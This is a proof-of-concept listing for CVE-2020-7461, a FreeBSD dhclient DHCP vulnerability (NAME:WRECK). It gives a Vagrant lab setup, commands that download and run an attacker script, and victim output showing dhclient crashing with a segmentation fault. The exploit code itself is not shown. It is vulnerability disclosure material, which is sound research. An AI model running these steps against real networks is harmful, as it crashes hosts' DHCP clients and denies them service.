CVE-2020-7461 PoC — FreeBSD 缓冲区错误漏洞

Source

Associated Vulnerability

Description

PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD

Readme

# CVE-2020-7461
PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD

For educational purposes only

## Environment
- Host: macOS 11.2.1
- Vagrant: 2.2.15
- Victim: FreeBSD 12.1-STABLE r364849
- Attacker: Ubuntu 20.04

## Disclaimer
This PoC will cause DoS instead of RCE to prevent abuse.

## PoC 

![wreck](imgs/wreck.png)

### Turn off DHCP server in VirtualBox

![dhcp](imgs/dhcp.png)

### Launch VMs

```
$ cd victim
$ vagrant up
$ cd ..
```

```
$ cd attacker
$ vagrant up
$ vagrant ssh
vagrant@vagrant:~$ sudo apt -y update && apt -y install python3 python3-pip
vagrant@vagrant:~$ wget https://raw.githubusercontent.com/knqyf263/CVE-2020-7461/main/poc.py
vagrant@vagrant:~$ python3 poc.py
Sniffing...
```

### Run dhclient

Open another terminal

```
$ cd victim
$ vagrant ssh
vagrant@freebsd:~ % sudo dhclient em1
DHCPREQUEST on em1 to 255.255.255.255 port 67
Invalid forward pointer in DHCP Domain Search option compression.
Segmentation fault
```

## References
- https://www.forescout.com/company/resources/namewreck-breaking-and-fixing-dns-implementations/
- https://www.freebsd.org/security/advisories/FreeBSD-SA-20:26.dhclient.asc

## Author
Teppei Fukuda

File Snapshot

 [4.0K]  /data/pocs/3ec41682ee1a982442573fc5e8f7ea3f72169a73
├── [4.0K]  attacker
│   └── [3.0K]  Vagrantfile
├── [4.0K]  imgs
│   ├── [822K]  dhcp.png
│   └── [397K]  wreck.png
├── [1.0K]  LICENSE
├── [2.3K]  poc.py
├── [1.1K]  README.md
└── [4.0K]  victim
    └── [3.0K]  Vagrantfile

3 directories, 7 files

Remarks